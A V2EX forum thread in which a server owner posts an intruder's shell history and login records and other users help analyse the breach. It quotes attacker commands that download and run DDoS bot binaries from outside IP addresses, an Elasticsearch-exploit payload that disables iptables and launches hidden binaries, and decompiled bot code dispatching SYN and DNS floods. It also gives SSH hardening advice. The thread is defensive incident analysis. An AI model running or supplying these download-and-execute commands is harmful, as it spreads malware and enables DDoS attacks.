服务器被入侵,麻烦高手帮忙分析下

2014-07-07 12:51:33 +08:00
 evilangel
服务器被入侵,密码被改了,流量一下跑了很多,麻烦高手帮忙分析下,这位黑兄拿我服务器干嘛了
root@(none):~# ls
bulong conf.n fake.cfg ssh33 wget-log.1
bulong.1 dlcfg getsetup.hb wget-log

root@(none):~# history
1 uptime
2 ps -aux
3 exit
4 free -m
5 df -h
6 passwd
7 ps -ef
8 wget http://222.186.40.170:666/getsetup.hb
9 chmod +x getsetup.hb
10 ./getsetup.hb
11 chattr +i getsetup.hb
12 wget http://96.44.185.98:8080/ssh33
13 chmod +x ssh33
14 ./ssh33
15 chattr +i ssh33
16 wget http://23.228.102.152:1818/bulong
17 ps -ef
18 wget http://23.228.102.152:1818/bulong
19 wget http://222.186.40.170:666/bulong
20 chmod +x bulong
21 ./bulong
22 chattr +i bulong
23 ps -ef
24 ls
25 history

root@(none):/var/log# last
root pts/1 111.8.2.138 Mon Jul 7 04:22 still logged in
reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:22 - 04:33 (00:10)
reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:16 - 04:20 (00:04)
root pts/0 58.22.113.155 Sun Jul 6 16:42 - 16:46 (00:03)
root pts/1 58.22.113.155 Sun Jul 6 16:08 - 16:11 (00:03)
root pts/0 58.22.113.155 Sun Jul 6 16:05 - 16:11 (00:06)
root pts/0 27.158.25.16 Sun Jul 6 04:41 - 04:41 (00:00)
root pts/0 ns405606.ip-37-1 Sat Jul 5 11:07 - 11:07 (00:00)
root pts/0 119.39.233.73 Wed Jul 2 14:01 - 16:50 (02:49)
root pts/0 119.39.233.73 Wed Jul 2 13:58 - 13:59 (00:00)
reboot system boot 3.15.3-x86_64-li Wed Jul 2 13:57 - 23:14 (4+09:16)
12533 次点击
所在节点    Linux
23 条回复
ihacku
2014-07-07 13:09:11 +08:00
wzxjohn
2014-07-07 13:19:44 +08:00
wget http://96.44.185.98:8080/ssh33
这个文件没下载下来,撸主能否上传到百度盘看看。
wzxjohn
2014-07-07 13:37:59 +08:00
evilangel
2014-07-07 13:56:29 +08:00
@wzxjohn 从IP上看貌似也是国人干的。
avrillavigne
2014-07-07 14:00:46 +08:00
诺顿scep 报Backdoor.Piltabe
humiaozuzu
2014-07-07 14:04:34 +08:00
我有几台服务器也被入侵了,不过还好权限是 elasticsearch 结束掉进程就 OK,没有被替换文件,补了 ES 的 bug 就好。
然后看了下下载的文件都一样,也是被用作 DDOS 了
evilangel
2014-07-07 16:20:22 +08:00
@wzxjohn 上传到百度网盘了,地址http://pan.baidu.com/s/1pJ9atC3 另外怎么看出来这个是DDOS服务程序的?用猜的我这种最可能的是DDOS或者服务器口令自动破解程序之类的。

@humiaozuzu 居然遇到的都是一样的。但是想不通是怎么在这么快的时间内破解我的root密码的。
markmx
2014-07-07 16:22:06 +08:00
前几天 我也被攻击了。 是土耳其的攻击。慢慢的斗智斗勇,终于搞定了
markmx
2014-07-07 16:22:53 +08:00
密码扫描这个事情。最好还是加上判断。几次输入密码错误,封闭IP!
humiaozuzu
2014-07-07 16:40:23 +08:00
@evilangel 如果不是弱口令,一般是已有的服务的 0day,比如我遇到的就是 elasticsearch 的,如果你那个服务用的是 root 权限运行,就可以随意修改密码了
wzxjohn
2014-07-07 16:41:58 +08:00
@evilangel 那个查杀报告里不是写了么。。。
henices
2014-07-07 17:38:23 +08:00
int __cdecl AddTask(int a1)
{
int v1; // ebx@1
int v2; // ebx@2
int v4; // eax@6
int v5; // edi@6
int v6; // eax@7
int v7; // eax@11
int v8; // eax@13

pthread_mutex_lock(TaskLockMutex);
v1 = taskcount;
if ( (unsigned int)taskcount > 0x13 )
{
v2 = taskcount + 33554432;
goto LABEL_3;
}
if ( CheckTaskExist(a1 + 80) )
{
v2 = v1 + 536870912;
goto LABEL_3;
}
v4 = malloc(132);
v5 = v4;
if ( !v4 )
{
v2 = v1 + 134217728;
goto LABEL_3;
}
memcpy(v4, a1, 112);
v6 = *(_DWORD *)(v5 + 8);
if ( v6 & 1 )
{
v7 = HbCreateThread(SynFloodThread, v5, v5 + 112, 0, 1);
}
else
{
if ( !(v6 & 2) )
{
LABEL_9:
v2 = v1 + 67108864;
free(v5);
goto LABEL_3;
}
v7 = HbCreateThread(DnsFloodThread, v5, v5 + 112, 0, 1);
}
if ( v7 != 1 )
goto LABEL_9;
v8 = pMaskTask;
if ( pMaskTask )
{
*(_DWORD *)(v5 + 128) = 0;
*(_DWORD *)(v5 + 124) = v8;
*(_DWORD *)(v8 + 128) = v5;
pMaskTask = v5;
}
else
{
pMaskTask = v5;
*(_DWORD *)(v5 + 124) = 0;
*(_DWORD *)(v5 + 128) = 0;
}
__asm { lock add ds:taskcount, 1 }
v2 = taskcount + 268435456;
LABEL_3:
pthread_mutex_unlock(TaskLockMutex);
return v2;
}
evilangel
2014-07-07 18:02:33 +08:00
@markmx 厉害,膜拜了!看来后面是需要配置一下。

@humiaozuzu 我是刚装完的系统,什么软件都没装了然后才一天时间就密码被人改了登陆不上了。重置密码之后就发现目录下面有东西然后历史命令里多了这十几条命令。

@wzxjohn 嗯嗯,没太注意看,刚又看了下发现了。谢谢了!


@henices 牛!!!
davansy
2014-07-07 22:27:03 +08:00
@evilangel 呵呵,还改你的密码了,看似刚出道的黑客刷存在感的样子。
Owenjia
2014-07-08 01:17:30 +08:00
还是禁止密码登录比较好吧~~
jalen
2014-07-08 14:31:32 +08:00
@Owenjia 禁止密码登录??还有啥其他方式?
Owenjia
2014-07-08 15:31:56 +08:00
@jalen 你是用的 ssh 吧?可以用密钥登陆啊~~可以看下这里 http://en.wikipedia.org/wiki/Ssh-keygen
netpro
2014-07-08 16:04:54 +08:00
@jalen 证书认证
oldcai
2014-07-09 14:51:16 +08:00
我也碰到同样的事情了,elasticsearch漏洞导致远程执行。
前几天被服务商告知在发出ddos攻击,我还不太相信,因为我一直都只用公私钥,不用密码登陆。

从log里面看来,一直在执行下面的东西。
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
chmod 0775 /usr/bin/wget
mkdir /etc/plngius
killall .Linux_time_y_2014
rm -r -f /etc/plngius/.Linux_time_y_2014
wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma
chmod 0755 /etc/plngius/.Linux_time_y_2014
nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 &
killall .Linux_time_y_2015
rm -r -f /tmp/.Linux_time_y_2015
wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp
chmod 0755 /tmp/.Linux_time_y_2015
nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 &
exit
pythoner
2014-07-09 21:51:25 +08:00
@jalen

1,修改ssh的默认端口
2,禁止root账号登陆
3,新建一个账号(不要用admin之类容易猜到的账号,并设置一个复杂的密码)并让其可以sudo su成root
4,用DenyHosts防止暴力破解将对方尝试破解的ip拒绝掉



我贴一个日志:

tail -n 1000 auth.log |grep 'Failed password for root '
Jul 9 20:26:02 s1 sshd[30294]: Failed password for root from 61.128.110.39 port 45014 ssh2
Jul 9 20:26:06 s1 sshd[30311]: Failed password for root from 61.128.110.39 port 46366 ssh2
Jul 9 20:26:09 s1 sshd[30459]: Failed password for root from 61.128.110.39 port 47481 ssh2

从上面的日志可以看到对方在尝试不同的端口号,由于我禁止了root账号登陆,所以就算端口号猜对了也会失败,失败3次之后 61.128.110.39就自动被防火墙拒绝掉(/etc/hosts.deny )

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/121336

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX